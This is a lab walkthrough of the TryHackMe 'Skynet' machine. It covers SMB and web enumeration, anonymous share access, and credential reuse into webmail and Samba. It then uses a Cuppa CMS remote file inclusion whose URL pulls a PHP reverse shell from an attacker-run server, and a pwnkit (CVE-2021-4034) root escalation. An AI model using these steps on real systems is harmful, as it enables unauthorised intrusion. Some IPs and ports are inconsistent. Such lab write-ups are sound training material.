Skynet machine on THM

A vulnerable Terminator themed Linux machine perfect for exploring SMB vulnerabilities and enumeration techniques.

Information gathering

Enumeration

nmap

Command:

nmap -sC -sV -A [machineIp]

Results:

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA SASL UIDL TOP PIPELINING RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: have post-login ID more listed capabilities Pre-login OK IMAP4rev1 ENABLE LOGIN-REFERRALS SASL-IR LOGINDISABLEDA0001 IDLE LITERAL+
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Smbmap

Command:

smbmap -u guest -d SKYNET\x00 -H 10.10.19.223 -P 139

Results:

[+] Guest session       IP: 10.10.19.223:139    Name: 10.10.19.223                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

Smbclient

Command:

smbclient -L 10.10.19.223 #list shares

Results:

Password for [WORKGROUP\rizi85]:
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))

Reconnecting with SMB1 for workgroup listing.
        Server               Comment
        ---------            -------
        Workgroup            Master
        ---------            -------
        WORKGROUP            SKYNET

dirb

Command:

dirb http://[machineIp]

Results:

---- Scanning URL: [http://10.10.19.223/](http://10.10.19.223/) ----
==> DIRECTORY: [http://10.10.19.223/admin/](http://10.10.19.223/admin/)
==> DIRECTORY: [http://10.10.19.223/config/](http://10.10.19.223/config/)
==> DIRECTORY: [http://10.10.19.223/css/](http://10.10.19.223/css/)
+ [http://10.10.19.223/index.html](http://10.10.19.223/index.html) (CODE:200|SIZE:523)
==> DIRECTORY: [http://10.10.19.223/js/](http://10.10.19.223/js/)
+ [http://10.10.19.223/server-status](http://10.10.19.223/server-status) (CODE:403|SIZE:277)
==> DIRECTORY: [http://10.10.19.223/squirrelmail/](http://10.10.19.223/squirrelmail/)

Exploitation

Foothold

1. Smbclient - anonymous connect

Command:

smbclient //10.10.161.244/anonymous -U " "%" "

Results:

Try "help" to get a list of possible commands.

smb: \> ls
  .                                   D        0  Thu Nov 26 11:04:00 2020
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs

1. Get attention.txt and content of logs folder and view files content

attention.txt

cat attention.txt                         

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.

-Miles Dyson

log1.txt

cat log1.txt    
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
...

Data exfiltration

1. Using the data discovered on the scanning phase we can login into the email interface using

url: http://10.10.19.223/squirrelmail/ user: milesdyson pass: cyborg007haloterminator

1. By checking email we will find an email containing samba password for milesdyson:

“We have changed your smb password after system malfunction. Password: )s{A&2Z=F^n_E.B “

1. Connect to samba share using the password from email

   smbclient //10.10.161.244/milesdyson  -U milesdyson
   

2. Check notes folder and retrieve important.txt file ```sh cat important.txt

3. Add features to beta CMS /45kra24zxs28v3yd
4. Work on T-800 Model 101 blueprints

5. Spend more time with my wife ```

6. Check the new discovered location from web: http://10.10.161.244/45kra24zxs28v3yd/administrator
7. This location is the login page for Cuppa CMS vulnerable as per https://www.exploit-db.com/exploits/25971
8. Using the vulnerable url from the exploit page you can remote execute code - insert a shell.php
   1. Create a php reverse shell file called shell.php -  use pentest monkey
   2. Start a local instance of the python server

       python3 -m http.server 809
      

   3. Craft the url to insert code: http://10.10.221.44/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.35.41:8090/shell.php
9. Use reverse shell connection to grab the flag from /home/milesdyson: [UserFlag]

Privilege escalation

1. Spawn an elevated shell using python

   python -c 'import pty; pty.spawn("/bin/bash")'
   

2. Get linpeas.py script from https://github.com/carlospolop/PEASS-ng/releases
3. Upload script on the victim machine using python http server
4. Run script and check output. as per the results the Linux version is vulnerable to CVE:2021-4034 https://www.exploit-db.com/exploits/50689
5. Change user to su milesdyson password Cyborg007haloterminator
6. Get the C script on victim machine and compile it ```sh gcc exploit.c -o exploit #compile

.exploit #run the script ```

1. Now you have root . Get the flag for root: [RootFlag]